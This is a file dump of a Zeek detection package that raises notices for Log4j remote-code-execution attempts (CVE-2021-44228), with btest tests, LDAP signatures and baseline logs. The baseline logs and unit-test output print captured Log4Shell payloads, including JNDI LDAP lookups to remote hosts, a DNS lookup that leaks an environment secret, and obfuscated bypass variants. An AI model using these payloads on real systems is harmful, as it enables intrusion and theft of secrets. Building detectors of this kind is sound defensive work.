├── testing ├── .gitignore ├── Makefile ├── Traces │ ├── Readme │ ├── log4j-attack.pcap │ ├── log4j-webapp.pcap │ ├── log4j-dns_exfil.pcap │ ├── log4j-user_agent.pcap │ ├── spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap │ └── 2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap ├── log4j │ ├── unit │ ├── ldap_java.zeek │ ├── log4j-attack │ ├── log4j-webapp │ ├── log4j-dns_exfil │ ├── log4j-user_agent │ ├── notice │ ├── 2021-12-11-thru-13-server-activity-with-log4j-attempts │ ├── log4j-log │ ├── ignore-orig │ ├── ignore-resp │ └── ignore-target ├── Files │ └── random.seed ├── Scripts │ ├── README │ ├── diff-remove-timestamps │ └── get-zeek-env ├── btest.cfg └── Baseline │ ├── log4j.log4j-log │ ├── log4j.log │ └── log4shell.log │ ├── log4j.notice │ ├── http.log │ └── notice.log │ ├── log4j.ldap_java │ ├── signatures.log │ └── notice.log │ ├── log4j.log4j-dns_exfil │ └── notice.log │ ├── log4j.log4j-attack │ └── notice.log │ ├── log4j.unit │ └── output │ ├── log4j.log4j-webapp │ └── notice.log │ ├── log4j.log4j-user_agent │ └── notice.log │ └── log4j.2021-12-11-thru-13-server-activity-with-log4j-attempts │ └── notice.log ├── scripts ├── __load__.zeek ├── ldap_java.sig ├── CVE_2021_44228_java_GET.zeek ├── tests.zeek └── CVE_2021_44228.zeek ├── zkg.meta ├── LICENSE └── README.md /testing/.gitignore: -------------------------------------------------------------------------------- 1 | .btest.failed.dat 2 | .tmp 3 | -------------------------------------------------------------------------------- /testing/Makefile: -------------------------------------------------------------------------------- 1 | 2 | test: 3 | @btest -c btest.cfg 4 | -------------------------------------------------------------------------------- /testing/Traces/Readme: -------------------------------------------------------------------------------- 1 | Source of log4j-webapp.pcap PCAP: https://github.com/cyberxml/log4j-poc/tree/main/data 
-------------------------------------------------------------------------------- /scripts/__load__.zeek: -------------------------------------------------------------------------------- 1 | @load ./CVE_2021_44228.zeek 2 | @load ./CVE_2021_44228_java_GET.zeek 3 | @load ./tests.zeek 4 | -------------------------------------------------------------------------------- /testing/Traces/log4j-attack.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/log4j-attack.pcap -------------------------------------------------------------------------------- /testing/Traces/log4j-webapp.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/log4j-webapp.pcap -------------------------------------------------------------------------------- /testing/Traces/log4j-dns_exfil.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/log4j-dns_exfil.pcap -------------------------------------------------------------------------------- /testing/Traces/log4j-user_agent.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/log4j-user_agent.pcap -------------------------------------------------------------------------------- /testing/log4j/unit: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure unit tests pass 2 | # @TEST-EXEC: zeek $PACKAGE -e 'redef CVE_2021_44228::run_tests = T;' %INPUT > output 3 | # @TEST-EXEC: btest-diff output 4 | -------------------------------------------------------------------------------- /testing/Traces/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap -------------------------------------------------------------------------------- /testing/Traces/2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap -------------------------------------------------------------------------------- /testing/log4j/ldap_java.zeek: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-webapp.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/log4j/log4j-attack: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-attack.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/log4j/log4j-webapp: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-webapp.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/log4j/log4j-dns_exfil: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: 
zeek -Cr $TRACES/log4j-dns_exfil.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/log4j/log4j-user_agent: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-user_agent.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/log4j/notice: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -r $TRACES/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | # @TEST-EXEC: btest-diff http.log 5 | -------------------------------------------------------------------------------- /testing/log4j/2021-12-11-thru-13-server-activity-with-log4j-attempts: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/Files/random.seed: -------------------------------------------------------------------------------- 1 | 2983378351 2 | 1299727368 3 | 0 4 | 310447 5 | 0 6 | 1409073626 7 | 3975311262 8 | 34130240 9 | 1450515018 10 | 1466150520 11 | 1342286698 12 | 1193956778 13 | 2188527278 14 | 3361989254 15 | 3912865238 16 | 3596260151 17 | 517973768 18 | 1462428821 19 | 0 20 | 2278350848 21 | 32767 22 | -------------------------------------------------------------------------------- /testing/log4j/log4j-log: 
-------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure log4j.log is created 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-user_agent.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff log4j.log 4 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-user_agent.pcap $PACKAGE %INPUT CVE_2021_44228::log_path=log4shell 5 | # @TEST-EXEC: btest-diff log4shell.log 6 | -------------------------------------------------------------------------------- /testing/Scripts/README: -------------------------------------------------------------------------------- 1 | Place helper scripts, such as btest-diff canonifiers, in this directory. 2 | Note that Zeek versions 4.1 and newer include their btest tooling as part 3 | of the installation. Take a look at the folder reported via 4 | 5 | zeek-config --btest_tools_dir 6 | 7 | for scripts, PRNG seeds, and pcaps you might be able to reuse. 8 | -------------------------------------------------------------------------------- /testing/log4j/ignore-orig: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure no notice is generated when ignoring originator hosts 2 | # @TEST-EXEC: zeek -r $TRACES/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: ! test -e notice.log 4 | # @TEST-EXEC: ! test -e log4j.log 5 | 6 | redef CVE_2021_44228::ignorable_orig_hosts += { 154.65.28.250 }; 7 | -------------------------------------------------------------------------------- /testing/log4j/ignore-resp: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure no notice is generated when ignoring responder hosts 2 | # @TEST-EXEC: zeek -r $TRACES/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: ! test -e notice.log 4 | # @TEST-EXEC: ! 
test -e log4j.log 5 | 6 | redef CVE_2021_44228::ignorable_resp_hosts += { 172.16.4.58 }; 7 | -------------------------------------------------------------------------------- /testing/log4j/ignore-target: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure no notice is generated when ignoring target hosts 2 | # @TEST-EXEC: zeek -r $TRACES/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: ! test -e notice.log 4 | # @TEST-EXEC: ! test -e log4j.log 5 | 6 | redef CVE_2021_44228::ignorable_target_hosts += { "45.83.193.150" }; 7 | -------------------------------------------------------------------------------- /zkg.meta: -------------------------------------------------------------------------------- 1 | [package] 2 | description = A Zeek package which raises notices for RCE in Log4J (CVE-2021-44228). 3 | summary = A Zeek package which raises notices for RCE in Log4J (CVE-2021-44228). 4 | tags = HTTP, Apache, CVE, CVE-2021-44228, encoding, rapidresponse, Java, logging 5 | version = 0.1 6 | script_dir = scripts 7 | # test_command = cd testing && btest -c btest.cfg 8 | -------------------------------------------------------------------------------- /testing/Scripts/diff-remove-timestamps: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env bash 2 | # 3 | # Replace anything which looks like timestamps with XXXs (including the #start/end markers in logs). 4 | 5 | # Get us "modern" regexps with sed. 
6 | if [ `uname` == "Linux" ]; then 7 | sed="sed -r" 8 | else 9 | sed="sed -E" 10 | fi 11 | 12 | $sed 's/(0\.000000)|([0-9]{9,10}\.[0-9]{2,8})/XXXXXXXXXX.XXXXXX/g' | \ 13 | $sed 's/^ *#(open|close).(19|20)..-..-..-..-..-..$/#\1 XXXX-XX-XX-XX-XX-XX/g' 14 | -------------------------------------------------------------------------------- /scripts/ldap_java.sig: -------------------------------------------------------------------------------- 1 | signature ldap_client_udp { 2 | ip-proto == udp 3 | payload /^\x30.\x02\x01.\x60/ 4 | } 5 | 6 | signature log4j_javaclassname_udp { 7 | ip-proto == udp 8 | payload /^\x30.*javaClassName/ 9 | requires-reverse-signature ldap_client_udp 10 | event "log4j_javaclassname_udp" 11 | } 12 | 13 | signature ldap_client_tcp { 14 | ip-proto == tcp 15 | payload /^\x30.\x02\x01.\x60/ 16 | } 17 | 18 | signature log4j_javaclassname_tcp { 19 | ip-proto == tcp 20 | payload /^\x30.*javaClassName/ 21 | requires-reverse-signature ldap_client_tcp 22 | event "log4j_javaclassname_tcp" 23 | } 24 | -------------------------------------------------------------------------------- /testing/btest.cfg: -------------------------------------------------------------------------------- 1 | [btest] 2 | TestDirs = log4j 3 | TmpDir = %(testbase)s/.tmp 4 | BaselineDir = %(testbase)s/Baseline 5 | IgnoreDirs = .tmp 6 | IgnoreFiles = *.tmp *.swp #* *.trace .DS_Store 7 | 8 | [environment] 9 | ZEEKPATH=`%(testbase)s/Scripts/get-zeek-env zeekpath` 10 | ZEEK_PLUGIN_PATH=`%(testbase)s/Scripts/get-zeek-env zeek_plugin_path` 11 | ZEEK_SEED_FILE=%(testbase)s/Files/random.seed 12 | PATH=`%(testbase)s/Scripts/get-zeek-env path` 13 | PACKAGE=%(testbase)s/../scripts 14 | TZ=UTC 15 | LC_ALL=C 16 | TRACES=%(testbase)s/Traces 17 | TMPDIR=%(testbase)s/.tmp 18 | TEST_DIFF_CANONIFIER=%(testbase)s/Scripts/diff-remove-timestamps 19 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-log/log4j.log: 
-------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path log4j 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value 9 | #types time string string string string string string string bool string string bool bool 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 /log4shell/ 172.16.238.11:1389/a 172.16.238.11:1389 172.16.238.11 1389 GET T USER-AGENT ${jndi:ldap://172.16.238.11:1389/a} F T 11 | #close XXXX-XX-XX-XX-XX-XX 12 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-log/log4shell.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path log4shell 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value 9 | #types time string string string string string string string bool string string bool bool 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 /log4shell/ 172.16.238.11:1389/a 172.16.238.11:1389 172.16.238.11 1389 GET T USER-AGENT ${jndi:ldap://172.16.238.11:1389/a} F T 11 | #close XXXX-XX-XX-XX-XX-XX 12 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.notice/http.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 
2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path http 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types 9 | #types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string] 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 154.65.28.250 57932 172.16.4.58 80 1 GET 24.14.233.177 / - 1.1 curl/7.58.0 - 0 550 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - FeXonJ2Qx5uVpCiE2d - text/html 11 | #close XXXX-XX-XX-XX-XX-XX 12 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.ldap_java/signatures.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 
2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path signatures 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid src_addr src_port dst_addr dst_port note sig_id event_msg sub_msg sig_count host_count 9 | #types time string addr port addr port enum string string string count count 10 | XXXXXXXXXX.XXXXXX ClEkJM2Vm5giqnMf4h 172.16.238.11 1389 172.16.238.10 57650 Signatures::Sensitive_Signature log4j_javaclassname_tcp 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... - - 11 | XXXXXXXXXX.XXXXXX CUM0KZ3MLUfNB0cl11 172.16.238.11 1389 172.16.238.10 57742 Signatures::Sensitive_Signature log4j_javaclassname_tcp 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... - - 12 | #close XXXX-XX-XX-XX-XX-XX 13 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.notice/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 
2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 154.65.28.250 57932 172.16.4.58 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 154.65.28.250 172.16.4.58 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | #close XXXX-XX-XX-XX-XX-XX 12 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-dns_exfil/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 
2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 10.10.10.31 36580 172.16.238.10 8080 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/log4shell/', payload_uri=10.10.10.31/POC_PASSWORD, payload_stem=10.10.10.31, payload_host=10.10.10.31, payload_port=-, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:dns://10.10.10.31/${env:POC_PASSWORD}}' 10.10.10.31 172.16.238.10 8080 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | #close XXXX-XX-XX-XX-XX-XX 12 | -------------------------------------------------------------------------------- /testing/Scripts/get-zeek-env: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | # 3 | # BTest helper for getting values for Zeek-related environment variables. 4 | 5 | base=$(dirname $0) 6 | zeek_dist=$(cat ${base}/../../build/CMakeCache.txt 2>/dev/null | grep ZEEK_DIST | cut -d = -f 2) 7 | 8 | if [ -n "${zeek_dist}" ]; then 9 | if [ "$1" = "zeekpath" ]; then 10 | ${zeek_dist}/build/zeek-path-dev 11 | elif [ "$1" = "zeek_plugin_path" ]; then 12 | ( cd ${base}/../.. 
&& pwd ) 13 | elif [ "$1" = "path" ]; then 14 | echo ${zeek_dist}/build/src:${zeek_dist}/aux/btest:${base}/:${zeek_dist}/aux/zeek-cut:$PATH 15 | else 16 | echo "usage: $(basename $0) " >&2 17 | exit 1 18 | fi 19 | else 20 | # Use Zeek installation for testing. In this case zeek-config must be in PATH. 21 | if ! which zeek-config >/dev/null 2>&1; then 22 | echo "zeek-config not found" >&2 23 | exit 1 24 | fi 25 | 26 | if [ "$1" = "zeekpath" ]; then 27 | zeek-config --zeekpath 28 | elif [ "$1" = "zeek_plugin_path" ]; then 29 | # Combine the local tree and the system-wide path. This allows 30 | # us to test on a local build or an installation made via zkg, 31 | # which squirrels away the build. --cpk 32 | echo "$(cd ${base}/../.. && pwd):$(zeek-config --plugin_dir)" 33 | elif [ "$1" = "path" ]; then 34 | echo ${PATH} 35 | else 36 | echo "usage: $(basename $0) " >&2 37 | exit 1 38 | fi 39 | fi 40 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2021, Corelight, Inc. All rights reserved. 2 | 3 | Redistribution and use in source and binary forms, with or without 4 | modification, are permitted provided that the following conditions are 5 | met: 6 | 7 | (1) Redistributions of source code must retain the above copyright 8 | notice, this list of conditions and the following disclaimer. 9 | 10 | (2) Redistributions in binary form must reproduce the above copyright 11 | notice, this list of conditions and the following disclaimer in 12 | the documentation and/or other materials provided with the 13 | distribution. 14 | 15 | (3) Neither the name of Corelight nor the names of any contributors 16 | may be used to endorse or promote products derived from this 17 | software without specific prior written permission. 
18 | 19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 21 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 22 | A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 23 | OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 24 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 25 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 26 | DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 27 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 28 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-attack/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX CUM0KZ3MLUfNB0cl11 198.51.100.10 39010 203.0.113.217 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 
0\x81\x92\x02\x01\x02d\x81\x8c\x04\x01a0\x81\x860\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://203.0.113.217:8000/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 198.51.100.10 203.0.113.217 1389 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 198.51.100.10 56958 203.0.113.217 8000 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_102', CONTENT-TYPE='application/java-vm', host='203.0.113.217' 198.51.100.10 203.0.113.217 8000 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 12 | #close XXXX-XX-XX-XX-XX-XX 13 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.unit/output: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 
2 | T 3 | T 4 | T 5 | T 6 | T 7 | T 8 | T 9 | T 10 | T 11 | T 12 | T 13 | [T] 14 | [T, T] 15 | [T, T, T] 16 | T 17 | T 18 | T 19 | T 20 | T 21 | T 22 | T 23 | T 24 | [T, T, T] 25 | [] 26 | ${${vgld:jfhv:zyh:c:tvrit:-j}${odm:t:stfd:vaxokx:qanuv:-n}${ufsgjh:tpr:wqlb:-d}${ohq:yyw:ovptvo:ftzg:bemff:-i}:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou} 27 | T 28 | T 29 | T 30 | ${jndi:corbal://0.17.149.63:30123/xvalystgst} 31 | T 32 | T 33 | T 34 | ${jndi:dns://9-99-149-125.example.net/va} 35 | T 36 | T 37 | T 38 | ${jndi:http://0.8.149.07:30871/xvalystgst} 39 | T 40 | T 41 | T 42 | ${jndi:iiop://0.96.149.90:08425/xvalystgst} 43 | T 44 | T 45 | T 46 | ${jndi:ldap://.gf8.rv/mmm} 47 | T 48 | T 49 | T 50 | ${jndi:ldap://dvuuy_hostnaug./a} 51 | T 52 | T 53 | T 54 | ${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class} 55 | T 56 | T 57 | T 58 | ${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a} 59 | T 60 | T 61 | T 62 | ${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk} 63 | T 64 | T 65 | T 66 | ${jndi:loqgrn${loqgr:s}://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co} 67 | T 68 | T 69 | T 70 | ${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-di${gnk:gnk_naug:-:}${gnk:gnk_naug:-l}d${gnk:gnk_naug:-a}p${gnk:gnk_naug:-:}//30.137.173.178:5851/q ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t 71 | T 72 | T 73 | T 74 | 
-------------------------------------------------------------------------------- /testing/Baseline/log4j.ldap_java/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. 
Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 12 | XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 13 | #close XXXX-XX-XX-XX-XX-XX 14 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-webapp/notice.log: -------------------------------------------------------------------------------- 1 | ### 